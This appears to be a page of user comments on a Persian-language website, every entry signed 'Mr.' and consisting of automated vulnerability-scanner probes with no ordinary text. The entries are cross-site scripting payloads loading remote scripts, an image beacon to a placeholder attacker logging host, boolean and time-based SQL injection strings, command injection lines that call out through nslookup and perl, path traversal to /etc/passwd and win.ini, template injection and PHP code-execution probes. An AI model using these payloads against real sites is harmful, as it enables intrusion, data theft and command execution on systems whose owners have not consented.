<% contenteditable onresize=H6wt(9789)>

05/08/1400 02:47 ب.ظ
Mr.

SB61T
<ScRiPt >H6wt(9737)</ScRiPt>

05/08/1400 02:47 ب.ظ
Mr.

<WY8NQ1>C3NUO[!+!]</WY8NQ1>

05/08/1400 02:47 ب.ظ
Mr.

<ifRAme sRc=9533.com></IfRamE>

05/08/1400 02:47 ب.ظ
Mr.

<yqILWi x=9702>

05/08/1400 02:47 ب.ظ
Mr.

<img sRc='http://attacker-9066/log.php?

05/08/1400 02:47 ب.ظ
Mr.

<I08P1c<

05/08/1400 03:45 ب.ظ
Mr.

'"()&%<acx><ScRiPt >YfWd(9925)</ScRiPt>

05/08/1400 03:45 ب.ظ
Mr.

'"()&%<acx><ScRiPt >YfWd(9753)</ScRiPt>

05/08/1400 03:45 ب.ظ
Mr.

9683579

05/08/1400 03:46 ب.ظ
Mr.

acu6569<s1﹥s2ʺs3ʹuca6569

05/08/1400 03:46 ب.ظ
Mr.

acux5595��z1��z2a�bcxuca5595

05/08/1400 03:46 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 03:46 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 03:46 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 03:46 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 03:46 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 03:46 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 03:46 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 03:46 ب.ظ
Mr.

<ScRiPt >YfWd(9209)</ScRiPt>

05/08/1400 03:46 ب.ظ
Mr.

<WRMWXY>GIJY7[!+!]</WRMWXY>

05/08/1400 03:46 ب.ظ
Mr.

<script>YfWd(9585)</script>

05/08/1400 03:46 ب.ظ
Mr.

<ScR<ScRiPt>IpT>YfWd(9416)</sCr<ScRiPt>IpT>

05/08/1400 03:46 ب.ظ
Mr.

<ScRiPt
>YfWd(9154)</ScRiPt>

05/08/1400 03:46 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9514></ScRiPt>

05/08/1400 03:47 ب.ظ
Mr.

<ScRiPt
>YfWd(9244)</ScRiPt>

05/08/1400 03:47 ب.ظ
Mr.

<svg  

�onload=YfWd(9229);>

05/08/1400 03:47 ب.ظ
Mr.

<isindex type=image src=1 onerror=YfWd(9192)>

05/08/1400 03:47 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9519'>

05/08/1400 03:47 ب.ظ
Mr.

<body onload=YfWd(9259)>

05/08/1400 03:47 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=YfWd(9587)>

05/08/1400 03:47 ب.ظ
Mr.

<img src=xyz OnErRor=YfWd(9491)>

05/08/1400 03:47 ب.ظ
Mr.

<img/src=">" onerror=alert(9514)>

05/08/1400 03:47 ب.ظ
Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%59%66%57%64%289787%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 03:47 ب.ظ
Mr.

\u003CScRiPt\YfWd(9367)\u003C/sCripT\u003E

05/08/1400 03:47 ب.ظ
Mr.

&lt;ScRiPt&gt;YfWd(9661)&lt;/sCripT&gt;

05/08/1400 03:47 ب.ظ
Mr.

�<img acu onmouseover=YfWd(91831) //�>

05/08/1400 03:47 ب.ظ
Mr.

<input autofocus onfocus=YfWd(9483)>

05/08/1400 03:47 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 03:47 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 03:47 ب.ظ
Mr.

}body{acu:Expre/**/SSion(YfWd(9285))}

05/08/1400 03:48 ب.ظ
Mr.

<% contenteditable onresize=YfWd(9266)>

05/08/1400 03:48 ب.ظ
Mr.

fpqQa
<ScRiPt >YfWd(9928)</ScRiPt>

05/08/1400 03:48 ب.ظ
Mr.

<WCLXYS>5UOLZ[!+!]</WCLXYS>

05/08/1400 03:48 ب.ظ
Mr.

<ifRAme sRc=9920.com></IfRamE>

05/08/1400 03:48 ب.ظ
Mr.

<wWHmgn x=9647>

05/08/1400 03:48 ب.ظ
Mr.

<img sRc='http://attacker-9368/log.php?

05/08/1400 03:48 ب.ظ
Mr.

<R1IGT8<

05/08/1400 03:50 ب.ظ
Mr.

'"()&%<acx><ScRiPt >rNC9(9527)</ScRiPt>

05/08/1400 03:50 ب.ظ
Mr.

'"()&%<acx><ScRiPt >rNC9(9879)</ScRiPt>

05/08/1400 03:50 ب.ظ
Mr.

9141093

05/08/1400 03:50 ب.ظ
Mr.

acu6076<s1﹥s2ʺs3ʹuca6076

05/08/1400 03:50 ب.ظ
Mr.

acux1719��z1��z2a�bcxuca1719

05/08/1400 03:50 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 03:50 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 03:50 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 03:50 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 03:50 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 03:50 ب.ظ
Mr.

-1 OR 2+682-682-1=0+0+0+1 --

05/08/1400 03:50 ب.ظ
Mr.

-1 OR 3+682-682-1=0+0+0+1 --

05/08/1400 03:50 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 03:50 ب.ظ
Mr.

-1 OR 2+375-375-1=0+0+0+1

05/08/1400 03:50 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 03:50 ب.ظ
Mr.

-1 OR 3+375-375-1=0+0+0+1

05/08/1400 03:50 ب.ظ
Mr.

-1' OR 2+90-90-1=0+0+0+1 --

05/08/1400 03:50 ب.ظ
Mr.

-1' OR 3+90-90-1=0+0+0+1 --

05/08/1400 03:50 ب.ظ
Mr.

-1' OR 2+995-995-1=0+0+0+1 or 'VuVCQFYA'='

05/08/1400 03:50 ب.ظ
Mr.

<ScRiPt >rNC9(9321)</ScRiPt>

05/08/1400 03:50 ب.ظ
Mr.

-1' OR 3+995-995-1=0+0+0+1 or 'VuVCQFYA'='

05/08/1400 03:50 ب.ظ
Mr.

-1" OR 2+256-256-1=0+0+0+1 --

05/08/1400 03:50 ب.ظ
Mr.

response.write(9191419*9941568)

05/08/1400 03:50 ب.ظ
Mr.

'+response.write(9191419*9941568)+'

05/08/1400 03:50 ب.ظ
Mr.

"+response.write(9191419*9941568)+"

05/08/1400 03:50 ب.ظ
Mr.

<WVHOSM>P69ZI[!+!]</WVHOSM>

05/08/1400 03:50 ب.ظ
Mr.

-1" OR 3+256-256-1=0+0+0+1 --

05/08/1400 03:50 ب.ظ
Mr.

if(now()=sysdate(),sleep(15),0)

05/08/1400 03:50 ب.ظ
Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

05/08/1400 03:50 ب.ظ
Mr.

<script>rNC9(9073)</script>

05/08/1400 03:50 ب.ظ
Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

05/08/1400 03:50 ب.ظ
Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

05/08/1400 03:50 ب.ظ
Mr.

<ScR<ScRiPt>IpT>rNC9(9209)</sCr<ScRiPt>IpT>

05/08/1400 03:51 ب.ظ
Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

05/08/1400 03:51 ب.ظ
Mr.

<ScRiPt
>rNC9(9219)</ScRiPt>

05/08/1400 03:51 ب.ظ
Mr.

echo hbtzth$()\ umazjl\nz^xyu||a #' &echo hbtzth$()\ umazjl\nz^xyu||a #|" &echo hbtzth$()\ umazjl\nz^xyu||a #

05/08/1400 03:51 ب.ظ
Mr.

&echo uddyef$()\ yukctv\nz^xyu||a #' &echo uddyef$()\ yukctv\nz^xyu||a #|" &echo uddyef$()\ yukctv\nz^xyu||a #

05/08/1400 03:51 ب.ظ
Mr.

|echo gqhpsy$()\ rsuhgs\nz^xyu||a #' |echo gqhpsy$()\ rsuhgs\nz^xyu||a #|" |echo gqhpsy$()\ rsuhgs\nz^xyu||a #

05/08/1400 03:51 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9678></ScRiPt>

05/08/1400 03:51 ب.ظ
Mr.

(nslookup hiteevwziskby9a981.bxss.me||perl -e "gethostbyname('hiteevwziskby9a981.bxss.me')")

05/08/1400 03:51 ب.ظ
Mr.

$(nslookup hitjvljxkaicre45d8.bxss.me||perl -e "gethostbyname('hitjvljxkaicre45d8.bxss.me')")

05/08/1400 03:51 ب.ظ
Mr.

&(nslookup hithpyidnfhiv7647f.bxss.me||perl -e "gethostbyname('hithpyidnfhiv7647f.bxss.me')")&'\"`0&(nslookup hithpyidnfhiv7647f.bxss.me||perl -e "gethostbyname('hithpyidnfhiv7647f.bxss.me')")&`'

05/08/1400 03:51 ب.ظ
Mr.

|(nslookup hitsclqnemrpha3f6b.bxss.me||perl -e "gethostbyname('hitsclqnemrpha3f6b.bxss.me')")

05/08/1400 03:51 ب.ظ
Mr.

`(nslookup hitfpjnvscluo29346.bxss.me||perl -e "gethostbyname('hitfpjnvscluo29346.bxss.me')")`

05/08/1400 03:51 ب.ظ
Mr.

;(nslookup hitduicleiypp2fe67.bxss.me||perl -e "gethostbyname('hitduicleiypp2fe67.bxss.me')")|(nslookup hitduicleiypp2fe67.bxss.me||perl -e "gethostbyname('hitduicleiypp2fe67.bxss.me')")&(nslookup hitduicleiypp2fe67.bxss.me||perl -e "gethostbyname('hitduicleiypp2fe67.bxss.me')")

05/08/1400 03:51 ب.ظ
Mr.

<ScRiPt
>rNC9(9041)</ScRiPt>

05/08/1400 03:51 ب.ظ
Mr.

<svg  

�onload=rNC9(9876);>

05/08/1400 03:51 ب.ظ
Mr.

<isindex type=image src=1 onerror=rNC9(9177)>

05/08/1400 03:51 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9627'>

05/08/1400 03:51 ب.ظ
Mr.

<body onload=rNC9(9201)>

05/08/1400 03:51 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=rNC9(9385)>

05/08/1400 03:51 ب.ظ
Mr.

<img src=xyz OnErRor=rNC9(9603)>

05/08/1400 03:51 ب.ظ
Mr.

<img/src=">" onerror=alert(9298)>

05/08/1400 03:51 ب.ظ
Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%72%4E%43%39%289170%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 03:51 ب.ظ
Mr.

\u003CScRiPt\rNC9(9486)\u003C/sCripT\u003E

05/08/1400 03:51 ب.ظ
Mr.

1QpGX3sj

05/08/1400 03:51 ب.ظ
Mr.

&lt;ScRiPt&gt;rNC9(9414)&lt;/sCripT&gt;

05/08/1400 03:52 ب.ظ
Mr.

�<img acu onmouseover=rNC9(92441) //�>

05/08/1400 03:52 ب.ظ
Mr.

../../../../../../../../../../../../../../etc/passwd

05/08/1400 03:52 ب.ظ
Mr.

../../../../../../../../../../../../../../windows/win.ini

05/08/1400 03:52 ب.ظ
Mr.

<input autofocus onfocus=rNC9(9208)>

05/08/1400 03:52 ب.ظ
Mr.

../

05/08/1400 03:52 ب.ظ
Mr.

./

05/08/1400 03:52 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 03:52 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 03:52 ب.ظ
Mr.

}body{acu:Expre/**/SSion(rNC9(9065))}

05/08/1400 03:52 ب.ظ
Mr.

<% contenteditable onresize=rNC9(9871)>

05/08/1400 03:52 ب.ظ
Mr.

iyQ2n
<ScRiPt >rNC9(9806)</ScRiPt>

05/08/1400 03:52 ب.ظ
Mr.

<esi:include src="http://bxss.me/rpb.png"/>

05/08/1400 03:52 ب.ظ
Mr.

<WRRJYS>1O0XP[!+!]</WRRJYS>

05/08/1400 03:52 ب.ظ
Mr.

${9999783+9999966}

05/08/1400 03:52 ب.ظ
Mr.

<ifRAme sRc=9205.com></IfRamE>

05/08/1400 03:52 ب.ظ
Mr.

<cQpjMa x=9399>

05/08/1400 03:52 ب.ظ
Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

05/08/1400 03:52 ب.ظ
Mr.

1some_inexistent_file_with_long_name.jpg

05/08/1400 03:52 ب.ظ
Mr.

Http://bxss.me/t/fit.txt

05/08/1400 03:52 ب.ظ
Mr.

http://bxss.me/t/fit.txt?.jpg

05/08/1400 03:52 ب.ظ
Mr.

bxss.me

05/08/1400 03:52 ب.ظ
Mr.

<img sRc='http://attacker-9212/log.php?

05/08/1400 03:52 ب.ظ
Mr.

<1WzooD<

05/08/1400 03:52 ب.ظ
Mr.

&n908887=v942459

05/08/1400 03:52 ب.ظ
Mr.

)

05/08/1400 03:53 ب.ظ
Mr.

!(()&&!|*|*|

05/08/1400 03:53 ب.ظ
Mr.

^(#$!@#$)(()))******

05/08/1400 03:53 ب.ظ
Mr.

'"()

05/08/1400 03:53 ب.ظ
Mr.

'.gethostbyname(lc('hityy'.'xfkyssys9fafb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(80).chr(102).chr(88).'

05/08/1400 03:53 ب.ظ
Mr.

".gethostbyname(lc("hitgv"."aqlglovv2c371.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(67).chr(109).chr(75)."

05/08/1400 03:53 ب.ظ
Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

05/08/1400 03:53 ب.ظ
Mr.

';print(md5(31337));$a='

05/08/1400 03:53 ب.ظ
Mr.

";print(md5(31337));$a="

05/08/1400 03:53 ب.ظ
Mr.

${@print(md5(31337))}

05/08/1400 03:53 ب.ظ
Mr.

${@print(md5(31337))}\

05/08/1400 03:53 ب.ظ
Mr.

'.print(md5(31337)).'

05/08/1400 03:53 ب.ظ
Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

05/08/1400 03:53 ب.ظ
Mr.

HttP://bxss.me/t/xss.html?%00

05/08/1400 03:53 ب.ظ
Mr.

bxss.me/t/xss.html?%00

05/08/1400 03:53 ب.ظ
Mr.

"+"A".concat(70-3).concat(22*4).concat(110).concat(89).concat(102).concat(78)+(require"socket"
Socket.gethostbyname("hitmz"+"pqbkthsj73623.bxss.me.")[3].to_s)+"

05/08/1400 03:53 ب.ظ
Mr.

'+'A'.concat(70-3).concat(22*4).concat(103).concat(90).concat(120).concat(85)+(require'socket'
Socket.gethostbyname('hitxr'+'tyogtkqqf811e.bxss.me.')[3].to_s)+'

05/08/1400 03:53 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-7

05/08/1400 03:53 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-7

05/08/1400 03:53 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-7/.

05/08/1400 03:53 ب.ظ
Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

05/08/1400 03:53 ب.ظ
Mr.

/xfs.bxss.me

05/08/1400 03:54 ب.ظ
Mr.

'"

05/08/1400 03:54 ب.ظ
Mr.

<!--

05/08/1400 03:54 ب.ظ
Mr.

'"()&%<acx><ScRiPt >26cD(9660)</ScRiPt>

05/08/1400 03:54 ب.ظ
Mr.

'"()&%<acx><ScRiPt >26cD(9053)</ScRiPt>

05/08/1400 03:54 ب.ظ
Mr.

9589689

05/08/1400 03:54 ب.ظ
Mr.

acu6352<s1﹥s2ʺs3ʹuca6352

05/08/1400 03:54 ب.ظ
Mr.

acux7824��z1��z2a�bcxuca7824

05/08/1400 03:54 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 03:54 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 03:54 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 03:54 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 03:54 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 03:54 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 03:54 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 03:54 ب.ظ
Mr.

<ScRiPt >26cD(9511)</ScRiPt>

05/08/1400 03:54 ب.ظ
Mr.

<WP3NDS>DKJUQ[!+!]</WP3NDS>

05/08/1400 03:54 ب.ظ
Mr.

<script>26cD(9157)</script>

05/08/1400 03:55 ب.ظ
Mr.

<ScR<ScRiPt>IpT>26cD(9838)</sCr<ScRiPt>IpT>

05/08/1400 03:55 ب.ظ
Mr.

<ScRiPt
>26cD(9729)</ScRiPt>

05/08/1400 03:55 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9204></ScRiPt>

05/08/1400 03:55 ب.ظ
Mr.

<ScRiPt
>26cD(9026)</ScRiPt>

05/08/1400 03:55 ب.ظ
Mr.

<svg  

�onload=26cD(9263);>

05/08/1400 03:55 ب.ظ
Mr.

<isindex type=image src=1 onerror=26cD(9428)>

05/08/1400 03:55 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9842'>

05/08/1400 03:55 ب.ظ
Mr.

<body onload=26cD(9884)>

05/08/1400 03:55 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=26cD(9142)>

05/08/1400 03:55 ب.ظ
Mr.

<img src=xyz OnErRor=26cD(9492)>

05/08/1400 03:55 ب.ظ
Mr.

<img/src=">" onerror=alert(9333)>

05/08/1400 03:55 ب.ظ
Mr.

%0D%0A%0D%0A%0D%0A%3C%53%63%52%69%50%74%20%3E%32%36%63%44%289058%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 03:55 ب.ظ
Mr.

\u003CScRiPt\26cD(9181)\u003C/sCripT\u003E

05/08/1400 03:55 ب.ظ
Mr.

&lt;ScRiPt&gt;26cD(9601)&lt;/sCripT&gt;

05/08/1400 03:55 ب.ظ
Mr.

�<img acu onmouseover=26cD(93631) //�>

05/08/1400 03:55 ب.ظ
Mr.

<input autofocus onfocus=26cD(9232)>

05/08/1400 03:55 ب.ظ
Mr.

<a HrEF=http://xss.bxss.me></a>

05/08/1400 03:55 ب.ظ
Mr.

<a HrEF=jaVaScRiPT:>

05/08/1400 03:55 ب.ظ
Mr.

}body{acu:Expre/**/SSion(26cD(9795))}

05/08/1400 03:55 ب.ظ
Mr.

<% contenteditable onresize=26cD(9478)>

05/08/1400 03:56 ب.ظ
Mr.

BuB1M
<ScRiPt >26cD(9453)</ScRiPt>

05/08/1400 03:56 ب.ظ
Mr.

<WQDZEF>LVJOH[!+!]</WQDZEF>

05/08/1400 03:56 ب.ظ
Mr.

<ifRAme sRc=9335.com></IfRamE>

05/08/1400 03:56 ب.ظ
Mr.

<7vra3P x=9770>

05/08/1400 03:56 ب.ظ
Mr.

<img sRc='http://attacker-9800/log.php?

05/08/1400 03:56 ب.ظ
Mr.

<ORiWuh<

05/08/1400 03:57 ب.ظ
Mr.

-5) OR 707=(SELECT 707 FROM PG_SLEEP(16.228))--

05/08/1400 03:57 ب.ظ
Mr.

-1)) OR 938=(SELECT 938 FROM PG_SLEEP(15))--

05/08/1400 03:57 ب.ظ
Mr.

utHvqAz6' OR 802=(SELECT 802 FROM PG_SLEEP(15))--

05/08/1400 03:57 ب.ظ
Mr.

ckMTGA3Y') OR 145=(SELECT 145 FROM PG_SLEEP(15))--

05/08/1400 03:57 ب.ظ
Mr.

ybomO0m6')) OR 350=(SELECT 350 FROM PG_SLEEP(15))--

05/08/1400 03:57 ب.ظ
Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

05/08/1400 03:57 ب.ظ
Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

05/08/1400 03:58 ب.ظ
Mr.

1'"

05/08/1400 03:58 ب.ظ
Mr.

1����%2527%2522

05/08/1400 03:58 ب.ظ
Mr.

@@RbmL6